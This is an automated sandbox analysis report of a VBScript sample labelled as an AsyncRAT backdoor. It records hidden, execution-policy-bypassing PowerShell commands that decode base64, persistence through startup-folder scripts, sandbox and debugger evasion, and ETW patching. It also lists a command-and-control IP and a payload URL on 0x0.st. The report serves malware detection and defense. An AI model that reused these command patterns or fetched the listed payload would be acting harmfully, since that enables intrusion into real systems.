                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3232
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7329
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2364
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5992
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep time: -11068046444225724s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952Thread sleep count: 6875 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -17524406870024063s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep count: 2895 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1608Thread sleep count: 6559 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 560Thread sleep count: 3232 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4108Thread sleep time: -14757395258967632s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2484Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284Thread sleep count: 7329 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6368Thread sleep time: -23058430092136925s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480Thread sleep count: 2364 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep count: 5992 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep time: -8301034833169293s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep count: 135 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 3900Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\dwm.exe TID: 6096Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                Source: powershell.exe, 0000001C.00000002.2323673539.0000020601DE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: powershell.exe, 00000012.00000002.2142824242.000001E1C1AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
                Source: powershell.exe, 00000005.00000002.2571355130.000001D32A670000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2440680152.000002CC1EA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2624164433.0000020678CA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: powershell.exe, 0000000B.00000002.1968300111.000001D7E484F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
                Source: C:\Windows\System32\cdd.dllSystem information queried: ModuleInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B8BE641 CheckRemoteDebuggerPresent,5_2_00007FFD9B8BE641
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
                Source: 5.2.powershell.exe.1d3130bafb0.5.raw.unpack, tcsnk.csReference to suspicious API methods: LoadLibrary("ntdll.dll")
                Source: 5.2.powershell.exe.1d3130bafb0.5.raw.unpack, tcsnk.csReference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
                Source: 5.2.powershell.exe.1d3130bafb0.5.raw.unpack, tcsnk.csReference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\LogonUI.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Windows\System32\LogonUI.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Lowering of HIPS / PFW / Operating System Security Settings

                Source: Yara matchFile source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPE
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information


                Remote Access Functionality

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information222
                Scripting
                Valid Accounts12
                Windows Management Instrumentation
                222
                Scripting
                1
                LSASS Driver
                1
                Deobfuscate/Decode Files or Information
                OS Credential Dumping2
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API
                1
                LSASS Driver
                1
                DLL Side-Loading
                13
                Obfuscated Files or Information
                LSASS Memory34
                System Information Discovery
                Remote Desktop Protocol1
                Screen Capture
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution
                1
                DLL Side-Loading
                11
                Process Injection
                3
                Software Packing
                Security Account Manager541
                Security Software Discovery
                SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Command and Scripting Interpreter
                1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                1
                DLL Side-Loading
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts1
                Scheduled Task/Job
                1
                Office Application Startup
                2
                Registry Run Keys / Startup Folder
                11
                Masquerading
                LSA Secrets251
                Virtualization/Sandbox Evasion
                SSHKeylogging113
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable Media3
                PowerShell
                2
                Registry Run Keys / Startup Folder
                RC Scripts1
                Modify Registry
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items251
                Virtualization/Sandbox Evasion
                DCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                Process Injection
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Behavior Graph ID: 1615978 | Sample: Xclient.vbs | Startdate: 15/02/2025 | Architecture: WINDOWS | Score: 100
                [Behavior graph rendered as an image; the node and edge information recoverable from it is listed below.]
                Contacted hosts: ip-api.com, api.msn.com, 3 other IPs or domains
                Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures
                Process chain:
                - wscript.exe drops C:\Users\user\AppData\...\bYKR19crJ6p8904.bat (ASCII) and starts cmd.exe; signatures: VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
                - cmd.exe starts cmd.exe and conhost.exe; signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy
                - cmd.exe starts powershell.exe and conhost.exe; signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly)
                - powershell.exe contacts 185.241.208.215 (ports 49736, 49741, 50051; GBTCLOUDUS, Moldova Republic of), ip-api.com 208.95.112.1 (ports 49735, 50050, 80; TUT-ASUS, United States) and 0x0.st 168.119.145.117 (ports 443, 49734, 49738; HETZNER-ASDE, Germany); drops C:\Users\user\...\StartupScript_6dd171fd.cmd (ASCII); starts shutdown.exe; signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Uses shutdown.exe to shutdown or reboot the system; 2 other signatures
                - 16 other processes (further cmd.exe, conhost.exe and powershell.exe instances) are started from the sample; one of them contacts 127.0.0.1

                Source | Detection | Scanner | Label | Link
                Xclient.vbs | 8% | Virustotal | | Browse
                Xclient.vbs | 27% | ReversingLabs | Script-WScript.Backdoor.Asyncrat |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://0x0.st | 0% | Avira URL Cloud | safe |
                185.241.208.215 | 0% | Avira URL Cloud | safe |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                a-0003.a-msedge.net | 204.79.197.203 | true | false | | high
                ip-api.com | 208.95.112.1 | true | false | | high
                0x0.st | 168.119.145.117 | true | false | | high
                api.msn.com | unknown | unknown | false | | high
                Name | Malicious | Antivirus Detection | Reputation
                https://0x0.st/8KuV.ps1 | false | | high
                185.241.208.215 | true | Avira URL Cloud: safe | unknown
                http://ip-api.com/line/?fields=hosting | false | | high
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://g.live.com/odclientsettings/Prod.C: | svchost.exe, 0000001F.00000003.2316380909.00000286952FF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.2316380909.000002869520E000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | false | | high
                http://nuget.org/NuGet.exe | powershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://g.live.com/odclientsettings/ProdV2 | svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.dr | false | | high
